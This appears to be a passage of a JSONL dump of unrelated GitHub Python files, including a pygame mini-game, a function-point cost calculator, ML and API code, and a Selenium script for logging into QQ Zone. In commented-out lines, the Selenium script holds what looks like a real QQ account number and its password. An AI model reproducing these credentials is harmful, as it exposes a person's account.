lon and assign to dataframe columns\n \ndata[['latitude', 'longitude']] = data.apply(lambda row :pd.Series(get_lat_lon(row['location'])), axis=1) \n\ndef price_m2(price, m2):\n \n import numpy as np\n try:\n \n return price/m2\n except:\n return np.nan\ndata['price_m2'] = data.apply(lambda x: price_m2(x['clean_price'], x['size_m2']), axis=1)\n ","repo_name":"sudpaul/life_hack","sub_path":"realestate.py","file_name":"realestate.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20244939310","text":"##Banco de dados\nbd = int(input(\"Quantidade de BD: \"))\narquivo = []\ntotal = 0\nfor i in range(0,bd):\n arquivo.append(int(input(\"Quantidade de linhas: \")))\n total = total + arquivo[i]\n##Entrada\ndadosref = 0\ndadosref1 = 0\ndadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 4:\n dadosref = dadosref + 1\n if arquivo[i] >= 5 and arquivo[i] <= 15:\n dadosref1 = dadosref1 + 1\n if arquivo[i] >= 16:\n dadosref2 = dadosref2 + 1\nentsimples = []\nentmedio = []\nentcomplexo = []\nif dadosref <= 1:\n entsimples.append(dadosref)\nelif dadosref == 2:\n entsimples.append(dadosref)\nelif dadosref >= 3:\n entmedio.append(dadosref)\nif dadosref1 <= 1:\n entsimples.append(dadosref1)\nelif dadosref1 == 2:\n entmedio.append(dadosref1)\nelif dadosref1 >= 3:\n entcomplexo.append(dadosref1)\nif dadosref2 <= 1:\n entmedio.append(dadosref2)\nelif dadosref2 == 2:\n entcomplexo.append(dadosref2)\nelif dadosref2 >= 3:\n entcomplexo.append(dadosref2)\nsomasimples = 0\nsomamedio = 0\nsomacomplexo = 0\nfor i in range(0,len(entsimples)):\n somasimples = entsimples[i] * 3 + somasimples\nfor i in range(0,len(entmedio)):\n somamedio = entmedio[i] * 4 + somamedio\nfor i in range(0,len(entcomplexo)):\n somacomplexo = entcomplexo[i] * 6 + somacomplexo\n##print(\"Entrada simples:\", somasimples)\n##print(\"Entrada médio:\", somamedio)\n##print(\"Entrada complexo:\", somacomplexo)\n##Saída\nsaidadadosref = 0\nsaidadadosref1 = 0\nsaidadadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 5:\n saidadadosref = saidadadosref + 1\n if arquivo[i] >= 6 and arquivo[i] <= 19:\n saidadadosref1 = saidadadosref1 + 1\n if arquivo[i] >= 20:\n saidadadosref2 = saidadadosref2 + 1\nif total <=5:\n saidadadosref = saidadadosref +1\nif total >= 6 and total <= 19:\n saidadadosref1 = saidadadosref1 +1\nif total >= 20:\n saidadadosref2 = saidadadosref2 +1\nsaidasimples = []\nsaidamedio = []\nsaidacomplexo = []\nif saidadadosref <= 1:\n saidasimples.append(saidadadosref)\nelif saidadadosref >= 2 and saidadadosref <= 3:\n saidasimples.append(saidadadosref)\nelif saidadadosref >= 4:\n saidamedio.append(saidadadosref)\nif saidadadosref1 <= 1:\n saidasimples.append(saidadadosref1)\nelif saidadadosref1 >= 2 and saidadadosref1 <= 3:\n saidamedio.append(saidadadosref1)\nelif saidadadosref1 >= 4:\n saidacomplexo.append(saidadadosref1)\nif saidadadosref2 <= 1:\n saidamedio.append(saidadadosref2)\nelif saidadadosref2 >= 2 and saidadadosref2 <= 3:\n saidacomplexo.append(saidadadosref2)\nelif saidadadosref2 >= 4:\n saidacomplexo.append(saidadadosref2)\nsdsimples = 0\nsdmedio = 0\nsdcomplexo = 0\nfor i in range(0,len(saidasimples)):\n sdsimples = saidasimples[i] * 4 + sdsimples\nfor i in range(0,len(saidamedio)):\n sdmedio = saidamedio[i] * 5 + sdmedio\nfor i in range(0,len(saidacomplexo)):\n sdcomplexo = saidacomplexo[i] * 7 + sdcomplexo\n##print(\"Saida simples:\", sdsimples)\n##print(\"Saida médio:\", sdmedio)\n##print(\"Saida complexo:\", sdcomplexo)\n##Consulta\nconsultadadosref = 0\nconsultadadosref1 = 0\nconsultadadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 4:\n consultadadosref = consultadadosref + 1\n if arquivo[i] >= 5 and arquivo[i] <= 15:\n consultadadosref1 = consultadadosref1 + 1\n if arquivo[i] >= 16:\n consultadadosref2 = consultadadosref2 + 1\nif total <=4:\n consultadadosref = consultadadosref +1\nif total >= 5 and total <= 15:\n consultadadosref1 = consultadadosref1 +1\nif total >= 16:\n consultadadosref2 = consultadadosref2 +1\nconsultasimples = []\nconsultamedio = []\nconsultacomplexo = []\nif consultadadosref <= 1:\n consultasimples.append(consultadadosref)\nelif consultadadosref == 2:\n consultasimples.append(consultadadosref)\nelif consultadadosref >= 3:\n consultamedio.append(consultadadosref)\nif consultadadosref1 <= 1:\n consultasimples.append(consultadadosref1)\nelif consultadadosref1 == 2:\n consultamedio.append(consultadadosref1)\nelif consultadadosref1 >= 3:\n consultacomplexo.append(consultadadosref1)\nif consultadadosref2 <= 1:\n consultamedio.append(consultadadosref2)\nelif consultadadosref2 == 2:\n consultacomplexo.append(consultadadosref2)\nelif consultadadosref2 >= 3:\n consultacomplexo.append(consultadadosref2)\nconsimples = 0\nconmedio = 0\nconcomplexo = 0\nfor i in range(0,len(consultasimples)):\n consimples = consultasimples[i] * 3 + consimples\nfor i in range(0,len(consultamedio)):\n conmedio = consultamedio[i] * 4 + conmedio\nfor i in range(0,len(consultacomplexo)):\n concomplexo = consultacomplexo[i] * 6 + concomplexo\n##print(\"Consulta simples:\", consimples)\n##print(\"Consulta médio:\", conmedio)\n##print(\"Consulta complexo:\", concomplexo)\n##Arquivos\narqdadosref = 0\narqdadosref1 = 0\narqdadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 19:\n arqdadosref = arqdadosref + 1\n if arquivo[i] >= 20 and arquivo[i] <= 50:\n arqdadosref1 = arqdadosref1 + 1\n if arquivo[i] >= 51:\n arqdadosref2 = arqdadosref2 + 1\narqsimples = []\narqmedio = []\narqcomplexo = []\nif arqdadosref <= 1:\n arqsimples.append(arqdadosref)\nelif arqdadosref >= 2 and arqdadosref <= 5:\n arqsimples.append(arqdadosref)\nelif arqdadosref >= 6:\n arqmedio.append(arqdadosref)\nif arqdadosref1 <= 1:\n arqsimples.append(arqdadosref1)\nelif arqdadosref1 >= 2 and arqdadosref1 <= 5:\n arqmedio.append(arqdadosref1)\nelif arqdadosref1 >= 6:\n arqcomplexo.append(arqdadosref1)\nif arqdadosref2 <= 1:\n arqmedio.append(arqdadosref2)\nelif arqdadosref2 >= 2 and arqdadosref2 <= 5:\n arqcomplexo.append(arqdadosref2)\nelif arqdadosref2 >= 6:\n arqcomplexo.append(arqdadosref2)\narqsomasimples = 0\narqsomamedio = 0\narqsomacomplexo = 0\nfor i in range(0,len(arqsimples)):\n arqsomasimples = arqsimples[i] * 7 + arqsomasimples\nfor i in range(0,len(arqmedio)):\n arqsomamedio = arqmedio[i] * 10 + arqsomamedio\nfor i in range(0,len(arqcomplexo)):\n arqsomacomplexo = arqcomplexo[i] * 15 + arqsomacomplexo\n##print(\"Arquivo simples:\", arqsomasimples)\n##print(\"Arquivo médio:\", arqsomamedio)\n##print(\"Arquivo complexo:\", arqsomacomplexo)\n##Interfaces\nintdadosref = 0\nintdadosref1 = 0\nintdadosref2 = 0\nfor i in range(0,bd):\n if arquivo[i] <= 19:\n intdadosref = intdadosref + 1\n if arquivo[i] >= 20 and arquivo[i] <= 50:\n intdadosref1 = intdadosref1 + 1\n if arquivo[i] >= 51:\n intdadosref2 = intdadosref2 + 1\nif total <= 19:\n intdadosref = intdadosref +1\nif total >= 20 and total <= 50:\n intdadosref1 = intdadosref1 +1\nif total >= 51:\n intdadosref2 = intdadosref2 +1\nintsimples = []\nintmedio = []\nintcomplexo = []\nif intdadosref <= 1:\n intsimples.append(intdadosref)\nelif intdadosref >= 2 and intdadosref <= 5:\n intsimples.append(intdadosref)\nelif intdadosref >= 6:\n intmedio.append(intdadosref)\nif intdadosref1 <= 1:\n intsimples.append(intdadosref1)\nelif intdadosref1 >= 2 and intdadosref1 <= 5:\n intmedio.append(intdadosref1)\nelif intdadosref1 >= 6:\n intcomplexo.append(intdadosref1)\nif intdadosref2 <= 1:\n intmedio.append(intdadosref2)\nelif intdadosref2 >= 2 and intdadosref2 <= 5:\n intcomplexo.append(intdadosref2)\nelif intdadosref2 >= 6:\n intcomplexo.append(intdadosref2)\nintsomasimples = 0\nintsomamedio = 0\nintsomacomplexo = 0\nfor i in range(0,len(intsimples)):\n intsomasimples = intsimples[i] * 5 + intsomasimples\nfor i in range(0,len(intmedio)):\n intsomamedio = intmedio[i] * 7 + intsomamedio\nfor i in range(0,len(intcomplexo)):\n intsomacomplexo = intcomplexo[i] * 10 + intsomacomplexo\n##print(\"Saida simples:\", intsomasimples)\n##print(\"Saida médio:\", intsomamedio)\n##print(\"Saida complexo:\", intsomacomplexo)\n##Calculos finais\nfpb = somasimples + somamedio + somacomplexo + sdsimples + sdmedio + sdcomplexo + intsomasimples + intsomamedio + intsomacomplexo + arqsomasimples + arqsomamedio + arqsomacomplexo + consimples + conmedio + concomplexo\nni = 1.35\nfpr = round(fpb * ni)\nprint(fpr)\nprint('''[1] - Cobol\n[2] - Pascal\n[3] - C++\n[4] - Java, Delph, Visual Basic\n[5] - SQL, HTML''')\nlocfp = int(input(\"Escolha uma opção: \"))\nprod = 0\nif locfp == 1:\n prod = fpr * 100\nif locfp == 2:\n prod = fpr * 90\nif locfp == 3:\n prod = fpr * 30\nif locfp == 4:\n prod = fpr * 20\nif locfp == 5:\n prod = fpr * 15\nprint('''[1] - Sistema Comercial\n[2] - Sistema Eletrônico\n[3] - Sistema Web''')\nsistema = int(input(\"Qual tipo de sistema: \"))\nif sistema == 1:\n prodmes = prod / 2500\nif sistema == 2:\n prodmes = prod / 3600\nif sistema == 3:\n prodmes = prod / 3300\nvh = int(input(\"Qual o valor da hora: \"))\ncusto = prodmes * 132 * vh\nprint('R${:.2f}'.format(custo))","repo_name":"Lucascvlh/CalculadoraMetrica","sub_path":"metrica.py","file_name":"metrica.py","file_ext":"py","file_size_in_byte":8589,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3412947568","text":"import streamlit as st\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom metaflow import Flow\nfrom metaflow import get_metadata, metadata\nimport matplotlib.pyplot as plt\nimport pandas as pd\nFLOW_NAME = 'MyFlow'\nmetadata('/home/bowenen/')\nprint(get_metadata())\n \n@st.cache\ndef get_latest_successful_run(flow_name: str):\n \"Gets the latest successfull run.\"\n for r in Flow(flow_name).runs():\n if r.successful: \n return r\n\nlatest_run = get_latest_successful_run(FLOW_NAME)\nlatest_model_no = latest_run.data.best_model_no\nlatest_model_no2 = latest_run.data.best_model_no2\nlatest_model_pm = latest_run.data.best_model_pm\n\n\n# show predictions\nst.markdown(\"## Predictions\")\n\n# play with the model\nst.markdown(\"## Model\")\n_x1 = st.text_input('closest_highway:', 3)\n_x2 = st.text_input('wind: ', 2)\n_x3 = st.text_input('road_type_motorway: ', 1)\n_x = {\n 'pop_den':[7],\n 'wind': [_x2],\n 'temp':[14],\n 'closest_highway': [_x1],\n 'closest_primary':[25],\n 'closest_secondary':[5],\n 'closest_tertiary':[5],\n 'trafic_signal_dist':[10],\n 'stop_sign_dist':[15],\n 'road_type_motorway': [_x3],\n 'road_type_primary':[0],\n 'zone_residential':[0],\n 'road_type_secondary':[0],\n 'road_type_tertiary':[0],\n 'zone_commercial':[0],\n 'zone_industrial':[0],\n 'zone_mixed':[0],\n 'zone_open_space':[0],\n 'road_type_residential':[0]\n}\n_x = pd.DataFrame(_x)\nval_no = latest_model_no.predict(_x)\nval_no2 = latest_model_no2.predict(_x)\nval_pm = latest_model_pm.predict(_x)\nst.write('Inputs are: closest_highway: {}, wind: {}, road_type_motorway: {}'.format(_x1, _x2, _x3))\nst.write('NO prediction is {}, NO2 prediction is {}, PM2.5 prediction is {}'.format(val_no, val_no2, val_pm))\nst.markdown(\"## Feature Importance\")\nFI_no = pd.DataFrame(latest_model_no.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_no = FI_no.sort_values(by = 'Feature Importance',ascending=False)\nFI_no2 = pd.DataFrame(latest_model_no2.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_no2 = FI_no2.sort_values(by = 'Feature Importance',ascending=False)\nFI_pm = pd.DataFrame(latest_model_pm.best_estimator_.feature_importances_, index = _x.columns, columns=['Feature Importance'])\nFI_pm = FI_pm.sort_values(by = 'Feature Importance',ascending=False)\nsummary_ = pd.DataFrame({'NO':list(FI_no.index),\n 'NO2':list(FI_no2.index),\n 'PM2.5':list(FI_pm.index)})\nst.write(summary_)\n\n# python3 -m streamlit run app.py","repo_name":"bowenen/FRE7773_FinalProject_Team5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21994999330","text":"# ***Pot Solution***\n# Difficulty: 1.3\n# Time Limit: 1 second, Memory Limit: 1024 MB\n# CPU Time: 0.05 s\n# Author: Nikola Dmitrović\n# Source: Croatian Open Competition in Informatics 2015/2016, contest #3\n# Link: https://open.kattis.com/problems/pot\n\n\nn = int(input())\ns = 0\nfor _ in range(n):\n b = input()\n p = int(b[-1])\n x = int(b[:-1])\n s += x ** p\nprint(s)\n","repo_name":"ahmedsiad/kattis-solutions","sub_path":"pot/pot.py","file_name":"pot.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19964447539","text":"import pygame as pg\r\nimport sys\r\nimport random\r\nimport time\r\nprint(\"\"\"\r\n\r\n\"\"\")\r\n# print(\"\"\"\t\t\t \r\n# \t\t _oo8oo_\r\n# \t\t o8888888o\r\n# \t\t 88: . :88\r\n# \t\t (: -_- :)\r\n# \t\t 0\\ = /0\r\n# \t\t ____/'==='\\____\r\n\t\t \r\n# \t\"\"\")\r\nprint(\"\"\"\r\n\t\t\t _oo8oo_\r\n\t\t\t o8888888o\r\n\t\t\t 88: . :88\r\n\t\t\t (: -_- :)\r\n\t\t\t 0\\ = /0\r\n\t\t\t ____/'==='\\____\r\n\t\t\t\t 欢迎使用Python游戏平台\r\n\r\n\t1.登录账号密码,正确直接进入2,若输入3次也可以进入,但提示游客身份进入。\r\n\t2.系统产生1-10随机数,猜对直接进入3,或猜错5次也可以进入,但提示未通关。\r\n\t3.接小球游戏,每三次速度加快,分数翻倍。\r\n\r\n\t\t********谢谢大家观看*******\r\n\t\"\"\")\r\ncount = 0\r\nwhile count < 3:\r\n name = str(input(\"请输入帐号\"))\r\n passwd = str(input(\"请输入密码\"))\r\n if (name != \"suntao\" or passwd != \"123456\"):\r\n count += 1\r\n s = 3 - count\r\n print(\"输入错误,还剩%d次机会\\n\" % s)\r\n if s == 0:\r\n print(\"您是游客身份登录\")\r\n else:\r\n print(\"尊敬的VIP,您已登录成功,直接进入游戏\\n\")\r\n break\r\n\r\ncount1 = 0\r\nnumber = random.randint(1, 10)\r\nprint(\"\"\"\t\t######系统将要产生1-10随机数######\r\n\t #########猜对直接进入游戏###############\r\n\t ########猜大会提示大,猜小提示小了########\r\n\t###猜错6次也可以进入游戏,但本次游戏未通关####\r\n\r\n\t\"\"\")\r\nprint(number)\r\nwhile True:\r\n num = int(input(\"请输入您要猜的整数\"))\r\n count1 += 1\r\n if (count1 < 6):\r\n if (num == number):\r\n print(\"您通关了,总共输入了%d次\\n\" % (count1))\r\n print(\"成功,进入下一个游戏\\n\")\r\n break\r\n elif (num < number):\r\n print(\"您输入小了,请再猜猜看\\n\")\r\n else:\r\n print(\"您输入大了,请再猜猜看\\n\")\r\n else:\r\n print(\"\"\"\t ******本关未通关*********\r\n *******输入次数已经达到6次***\r\n *********进入下一个游戏************\r\n\r\n \"\"\")\r\n break\r\n\r\npg.init()\r\nprint(\"游戏开始,您的初始分值为0\\n\")\r\ngame_window = pg.display.set_mode((600, 500))\r\npg.display.set_caption('接球小游戏')\r\nwindow_color = (0, 0, 255)\r\nball_color = (255, 165, 0)\r\nrect_color = (255, 0, 0)\r\nscore = 0\r\nfont = pg.font.SysFont('arial', 70)\r\nball_x = random.randint(20, 580)\r\nball_y = 20\r\nmove_x = 1\r\nmove_y = 1\r\npoint = 1\r\ncount = 0\r\nwhile True:\r\n game_window.fill(window_color)\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n sys.exit()\r\n mouse_x, mouse_y = pg.mouse.get_pos()\r\n pg.draw.circle(game_window, ball_color, (ball_x, ball_y), 20)\r\n pg.draw.rect(game_window, rect_color, (mouse_x, 490, 100, 10))\r\n my_text = font.render(str(score), False, (255, 255, 255))\r\n game_window.blit(my_text, (500, 30))\r\n ball_x += move_x\r\n ball_y += move_y\r\n if ball_x <= 20 or ball_x >= 580:\r\n move_x = -move_x\r\n if ball_y <= 20:\r\n move_y = -move_y\r\n elif mouse_x - 20 < ball_x < mouse_x + 120 and ball_y >= 470:\r\n move_y = -move_y\r\n score += point\r\n count += 1\r\n if count == 3:\r\n count = 0\r\n point += point\r\n if move_x > 0:\r\n move_x += 1\r\n else:\r\n move_x -= 1\r\n move_y -= 1\r\n elif ball_y >= 480 and (ball_x <= mouse_x - 20 or ball_x >= mouse_x + 120):\r\n time.sleep(3)\r\n break\r\n pg.display.update()\r\n time.sleep(0.005)\r\nprint(\"游戏结束,您的得分为%d\" % (score))\r\n","repo_name":"suntaopython/-games","sub_path":"over_project.py","file_name":"over_project.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33176506369","text":"\"\"\"\n* Optional Types\n* 있을 수도 있고, 없을 수도 있는 Type 지정\n* Optional Types는 Union Types로 대체될 수 있음!(= 유사한 기능)\n\"\"\"\nfrom typing import Union, Optional\n\n\n# Union Types를 사용한 경우\nxxx: Union[str, None] = \"hinodi5\"\n\nxxx = None\n\n\n# Optional Types를 사용한 경우\nyyy: Optional[str] = \"hinoi5\"\n\nyyy = None\n\n\n# Optional Types가 필요한 이유 : '있을 수도 있고, 없을 수도 있는 경우가 많기 때문!'\ndef foo(name: str) -> Optional[str]:\n if name == \"hinodi5\":\n return None\n else:\n return name\n\n\nresult: Optional[str] = foo(\"hinodi5\")\nprint(result)\n\"\"\"\n$ mypy 18-optional_types.py && python 18-optional_types.py \nSuccess: no issues found in 1 source file\nNone\n\"\"\"\n","repo_name":"jinhyungrhee/type_python","sub_path":"18-optional_types.py","file_name":"18-optional_types.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13372989809","text":"import math\n\n# compute Entropy\ndef entD (dataSet, feature) :\n values = dataSet[feature].value_counts(normalize=True)\n sum = 0\n for i in values :\n sum += i* math.log2(i)\n sum = -sum\n return sum\n\n\n# compute gain and IV, return a Dict\ndef getGainDicByFeature(dataSet, feature, entDValue, entD_feature,entireAttrSet) :\n\n valuesRateList = dataSet[feature].value_counts(normalize=True)\n num = len(valuesRateList)\n valuesList = dataSet[feature]\n\n attiData = []\n entList = []\n entSum = 0\n sum = 0\n IV = 0\n\n # Judge whether it is a continuous value\n if( entireAttrSet[feature]['ifContinuous']) :\n dict = _getGainDicByFeatureInContinuous(dataSet, feature, entDValue, entD_feature )\n return dict\n else :\n for i in range(num) :\n attiData.append(dataSet[dataSet[feature] == valuesRateList.index[i] ])\n entList.append (entD (attiData[i], entD_feature))\n entSum += valuesRateList[valuesRateList.index[i]] * entList[i]\n\n ratio = valuesRateList[valuesRateList.index[i]]\n sum += ratio * math.log2(ratio)\n\n IV = -sum\n gain = entDValue - entSum\n return {'gain':gain, 'IV':IV, 'continuous': False}\n\n\ndef attrSetGenerate (dataSet) :\n #print('current Function: attrSetGenerate') \n\n attrSet = {}\n ent_attrition = entD(dataSet, 'Attrition')\n for index in dataSet.columns :\n if index!='Attrition' :\n #print('current Feature: ',index)\n \n attrSet[index] = {}\n valuesList = dataSet[index]\n valuesRateList = dataSet[index].value_counts(normalize=True)\n num = len(valuesRateList)\n\n #Judge whether it is a continuous value\n if( len(valuesRateList) >=15 and str(valuesList[valuesList.index[0]]).isdigit()) :\n #dict = _getGainDicByFeatureInContinuous(dataSet, index, ent_attrition, 'Attrition')\n #attrSet[index] = {'bestBoundary': dict['bestBoundary']} \n attrSet[index] = {'ifContinuous':True}\n\n else :\n attrSet[index]['Attribution'] = []\n for i in range(num) :\n attrSet[index]['Attribution'].append(valuesRateList.index[i])\n #print(valuesRateList.index[i])\n attrSet[index]['ifContinuous'] = False\n\n #print(attrSet)\n return attrSet\n \n\ndef _getGainDicByFeatureInContinuous (dataSet, feature, entDValue, entD_feature) :\n #order\n orderedDataSet = dataSet.sort_values(by=feature)\n orderedValuesList = orderedDataSet[feature].reset_index(drop=True)\n\n bestBoundary = ( orderedValuesList[0] + orderedValuesList[1] ) / 2\n bestGain = 0\n IV = 0\n bestI = 0\n\n ListNum = len(dataSet)\n\n #Loops get the best demarcation\n for i in range(ListNum) :\n P = (i+1)/ListNum\n attiData = []\n entList = []\n\n attiData.append(orderedDataSet[0:i+1])\n attiData.append(orderedDataSet[i+1:])\n\n entList.append( entD( attiData[0], entD_feature ))\n entList.append( entD( attiData[1], entD_feature ))\n\n entSum = P * entList[0] + (1-P) * entList[1]\n gain = entDValue - entSum\n\n if gain >= bestGain :\n bestGain = gain\n bestBoundary = ( orderedValuesList[i] + orderedValuesList[i+1] ) / 2;\n bestI = i\n IV = -(P* math.log2(P) + (1-P) * math.log2(1 - P))\n\n return {'gain': bestGain, 'IV':IV, 'continuous': True, 'bestBoundary': bestBoundary, 'bestI':bestI}\n\n\ndef ifSameClass(dataSet, feature) :\n\n valuesRateList = dataSet[feature].value_counts(normalize=True)\n\n if (len(valuesRateList) == 1):\n return valuesRateList.index[0]\n else :\n return 0\n\ndef ifAllClassSame(dataSet) :\n df2 = dataSet.copy()\n del df2['Attrition']\n for index in df2.columns :\n values = df2[index].value_counts(normalize=True)\n if(len(values) != 1) :\n return 0 \n\n return 1\n\ndef getClass(dataSet, predictfeature) :\n \n bestClass = ''\n bestRate = 0\n valuesRateList = dataSet[predictfeature].value_counts(normalize=True)\n \n for i in range(len(valuesRateList)) :\n if valuesRateList[valuesRateList.index[i]] > bestRate :\n bestClass = valuesRateList.index[i]\n bestRate = valuesRateList[valuesRateList.index[i]]\n\n return bestClass\n\ndef featureClass(tree, data):\n curNode = list(tree.keys())\n if curNode[0] == 'Attrition' :\n return tree['Attrition']\n else :\n keyList = list(tree[curNode[0]].keys())\n if(ifContinuous(keyList)) :\n if(eval(str(data[curNode[0]]) + keyList[0])) :\n return featureClass(tree[curNode[0]][keyList[0]],data)\n else :\n return featureClass(tree[curNode[0]][keyList[1]],data)\n else :\n return featureClass(tree[curNode[0]][data[curNode[0]]],data)\n\ndef ifContinuous(keyList) :\n for i in keyList :\n if '>=' in str(i) :\n return True\n return 0 \n\n\n\n\n\n\n\n","repo_name":"MarioBrosECS/predicting-employee-attrition-Soton-ECS","sub_path":"src/models/decisionTree/algorithm_Ernest/API_Ernest.py","file_name":"API_Ernest.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"72229168553","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time :2020/7/18 20:38\n# @Author :DKJ\n# @File :04模拟登录qq空间.py\n# @Software :PyCharm\n\nimport requests\nfrom selenium import webdriver\nfrom lxml import etree\nimport time\ndriver = webdriver.Chrome(executable_path='./chromedriver')\ndriver.get('https://qzone.qq.com/')\n#在web 应用中经常会遇到frame 嵌套页面的应用,使用WebDriver 每次只能在一个页面上识别元素,对于frame 嵌套内的页面上的元素,直接定位是定位是定位不到的。这个时候就需要通过switch_to_frame()方法将当前定位的主体切换了frame 里。\ndriver.switch_to.frame('login_frame')\ndriver.find_element_by_id('img_out_1016617094').click()\n# driver.find_element_by_id('switcher_plogin').click()\n#driver.find_element_by_id('u').clear()\n# driver.find_element_by_id('u').send_keys('1016617094') #这里填写你的QQ号\n#driver.find_element_by_id('p').clear()\n# driver.find_element_by_id('p').send_keys('dkj011018') #这里填写你的QQ密码\n# driver.find_element_by_id('login_button').click()\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\ndriver.execute_script('window.scrollTo(0,document.body.scrollHeight)')\ntime.sleep(2)\n# page_text = driver.page_source\n# tree = etree.HTML(page_text)\n# #执行解析操作\n# li_list = tree.xpath('//ul[@id=\"feed_friend_list\"]/li')\n# for li in li_list:\n# text_list = li.xpath('.//div[@class=\"f-info\"]//text()|.//div[@class=\"f-info qz_info_cut\"]//text()')\n# text = ''.join(text_list)\n# print(text+'\\n\\n\\n')\ndriver.close()","repo_name":"Kedreamix/fun_spider","sub_path":"05.动态加载数据处理/04模拟登录qq空间.py","file_name":"04模拟登录qq空间.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216475349","text":"from __future__ import absolute_import\n\nfrom datetime import datetime, timedelta\nfrom flask.ext.restful import reqparse\n\nfrom changes.api.base import APIView\nfrom changes.models.jobstep import JobStep\nfrom changes.models.node import Cluster, Node\n\n\nclass ClusterNodesAPIView(APIView):\n parser = reqparse.RequestParser()\n parser.add_argument('since', type=int, location='args')\n\n def get(self, cluster_id):\n cluster = Cluster.query.get(cluster_id)\n if cluster is None:\n return '', 404\n\n queryset = Node.query.filter(\n Node.clusters.contains(cluster),\n ).order_by(Node.label.asc())\n\n args = self.parser.parse_args()\n if args.since:\n cutoff = datetime.utcnow() - timedelta(days=args.since)\n\n queryset = queryset.join(\n JobStep, JobStep.node_id == Node.id,\n ).filter(\n JobStep.date_created > cutoff,\n ).group_by(Node)\n\n return self.paginate(queryset)\n","repo_name":"dropbox/changes","sub_path":"changes/api/cluster_nodes.py","file_name":"cluster_nodes.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"24483529090","text":"print(\"Starting\")\r\n\r\nimport dioph, useful\r\n\r\n##need 0=5b^2-4L^2+-8b+4\r\n\r\nsolutionNeg = [16,17]\r\nsolutionPlus =[272,305]\r\n## P Q K R S L\r\n## X_(n+1) = PX_n+QY_n+K\r\n## Y_(n+1) = RX_n+SY_n+L\r\n\r\n##These are from http://www.alpertron.com.ar/QUAD.HTM\r\n##after inserting the equation\r\nplusRecCoeff= [-9,-8,-8,-10,-9,-8]\r\nnegRecCoeff= [-9,-8,8,-10,-9,8]\r\n\r\n\r\ndef nextNeg(val):\r\n x = val[0]\r\n y = val[1]\r\n xnew = negRecCoeff[0]*x+negRecCoeff[1]*y+negRecCoeff[2]\r\n ynew = negRecCoeff[3]*x+negRecCoeff[4]*y+negRecCoeff[5]\r\n return [xnew,ynew]\r\ndef nextPlus(val):\r\n x = val[0]\r\n y = val[1]\r\n xnew = plusRecCoeff[0]*x+plusRecCoeff[1]*y+plusRecCoeff[2]\r\n ynew = plusRecCoeff[3]*x+plusRecCoeff[4]*y+plusRecCoeff[5]\r\n return [xnew,ynew]\r\n\r\ncurrentNeg = solutionNeg\r\ncurrentPlus = solutionPlus\r\nanswer = 17+305\r\nfor i in range(5):\r\n currentNeg = nextNeg(currentNeg)\r\n currentPlus = nextPlus(currentPlus)\r\n currentNeg = nextNeg(currentNeg)\r\n currentPlus = nextPlus(currentPlus)\r\n answer += currentNeg[1]\r\n answer += currentPlus[1]\r\n\r\nprint(answer)\r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 138.py","file_name":"problem 138.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27393374899","text":"import sys, re\nimport xml.etree.ElementTree as ET\n\n\n\nif __name__ == '__main__':\n\troot = ET.parse(sys.stdin).getroot()\n\n\tfor sentence in root.iter('s'):\n\t\tfor latin in sentence.iterfind('foreign'):\n\t\t\tsentence.remove(latin)\n\n\t\tcontent = \"\".join(sentence.itertext())\n\n\t\tif content != '' and content != ' ':\n\t\t\tprint(content) ","repo_name":"cltk/ang_models_cltk","sub_path":"src/python/clean_toronto_oe_corpus.py","file_name":"clean_toronto_oe_corpus.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"40404092517","text":"\"\"\"empty message\n\nRevision ID: 44194fb1a53f\nRevises: b8364b16d6af\nCreate Date: 2019-05-15 14:44:17.320022\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '44194fb1a53f'\ndown_revision = 'b8364b16d6af'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('tutor', 'hourlyrate',\n existing_type=sa.INTEGER(),\n nullable=True)\n op.add_column('tutorlocation', sa.Column('id', sa.Integer(), nullable=False, primary_key=True))\n op.drop_table('tutorlocation')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please 